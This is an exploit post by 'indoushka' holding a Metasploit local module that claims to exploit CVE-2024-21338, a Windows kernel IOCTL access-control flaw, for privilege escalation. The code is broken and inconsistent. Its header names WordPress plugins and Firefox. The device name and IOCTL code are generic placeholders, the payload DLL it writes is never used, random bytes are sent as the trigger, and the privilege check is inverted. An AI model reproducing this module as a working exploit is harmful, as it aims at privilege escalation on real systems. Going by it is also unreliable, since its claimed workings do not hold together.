============================================================================================================================================= | # Title : Windows 10.0.17763.5458 Kernel IOCTL Access Control Vulnerability Exploit | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) | | # Vendor : https://wordpress.org/plugins/ | ============================================================================================================================================= POC : [+] References : https://packetstorm.news/files/id/177869/ & CVE-2024-21338 [+] Summary : Windows Kernel IOCTL Insufficient Access Control Vulnerability CVE-2024-21338', 'Description' => %q{ This module exploits an insufficient access control vulnerability in the Windows Kernel through exposed IOCTL handlers. The vulnerability allows non-privileged users to access kernel-level functionality leading to privilege escalation. [+] POC : ############################################# # Exploit Title: Windows 10.0.17763.5458 Kernel IOCTL Access Control Vulnerability Exploit CVE-2024-21338 # Author: indoushka ############################################# require 'msf/core' class MetasploitModule < Msf::Exploit::Local Rank = NormalRanking include Msf::Exploit::EXE include Msf::Exploit::FileDropper include Msf::Post::Windows::Priv include Msf::Post::Windows::Process def initialize(info = {}) super( update_info( info, 'Name' => 'Windows Kernel IOCTL Insufficient Access Control Vulnerability CVE-2024-21338', 'Description' => %q{ This module exploits an insufficient access control vulnerability in the Windows Kernel through exposed IOCTL handlers. The vulnerability allows non-privileged users to access kernel-level functionality leading to privilege escalation. }, 'Author' => ['indoushka'], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2024-21338'], ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21338'], ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2024-21338'] ], 'Platform' => 'win', 'Arch' => [ARCH_X64], 'SessionTypes' => ['meterpreter'], 'Payload' => { 'Space' => 4096, 'DisableNops' => true }, 'Targets' => [ [ 'Windows 10/11 x64', { 'Arch' => ARCH_X64, 'Platform' => 'win' } ] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'EXITFUNC' => 'thread' }, 'DisclosureDate' => '2024-01-09', 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [ARTIFACTS_ON_DISK] } ) ) register_options([ OptString.new('DEVICE_NAME', [true, 'Vulnerable device name', '\\\\.\\VulnerableDriver']), OptInt.new('IOCTL_CODE', [true, 'Vulnerable IOCTL code', 0x222003]) ]) end def check # Check if we're on a vulnerable system if sysinfo['OS'] !~ /windows/i return CheckCode::Safe('Target is not a Windows system') end # Check architecture if sysinfo['Architecture'] !~ /x64/ return CheckCode::Safe('Target architecture is not supported') end # Check if we have necessary privileges unless is_system? return CheckCode::Detected('User does not have SYSTEM privileges') end # Verify vulnerable driver exists device_path = datastore['DEVICE_NAME'] if device_exists?(device_path) return CheckCode::Appears('Vulnerable device driver detected') else return CheckCode::Safe('Vulnerable device driver not found') end end def exploit print_status("Starting exploitation for CVE-2024-21338") # Check target environment unless check == CheckCode::Appears fail_with(Failure::NotVulnerable, 'Target is not vulnerable') end # Generate payload print_status("Generating payload...") payload_data = generate_payload_dll # Create temporary file for payload temp_path = "#{get_env('TEMP')}\\#{Rex::Text.rand_text_alpha(8)}.dll" print_status("Writing payload to #{temp_path}") write_file(temp_path, payload_data) register_file_for_cleanup(temp_path) # Execute exploitation print_status("Triggering vulnerability via IOCTL...") if trigger_exploit(temp_path) print_good("Exploitation successful!") else fail_with(Failure::Unknown, "Exploitation failed") end end private def device_exists?(device_path) begin file = client.railgun.kernel32.CreateFileA( device_path, 'GENERIC_READ', 'FILE_SHARE_READ|FILE_SHARE_WRITE', nil, 'OPEN_EXISTING', 'FILE_ATTRIBUTE_NORMAL', 0 ) if file['return'] != client.railgun.const('INVALID_HANDLE_VALUE') client.railgun.kernel32.CloseHandle(file['return']) return true end rescue return false end false end def trigger_exploit(payload_path) begin # Open device handle device_handle = client.railgun.kernel32.CreateFileA( datastore['DEVICE_NAME'], 'GENERIC_READ | GENERIC_WRITE', 0, nil, 'OPEN_EXISTING', 0, 0 ) if device_handle['return'] == client.railgun.const('INVALID_HANDLE_VALUE') print_error("Failed to open device handle") return false end # Prepare buffer for exploitation buffer_size = 1024 input_buffer = Rex::Text.rand_text_alpha(buffer_size) # Send vulnerable IOCTL ioctl_result = client.railgun.kernel32.DeviceIoControl( device_handle['return'], datastore['IOCTL_CODE'], input_buffer, input_buffer.length, nil, 0, 4, nil ) # Cleanup client.railgun.kernel32.CloseHandle(device_handle['return']) if ioctl_result['return'] print_good("IOCTL sent successfully") return true else print_error("IOCTL failed") return false end rescue => e print_error("Exploitation error: #{e.message}") return false end end end Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================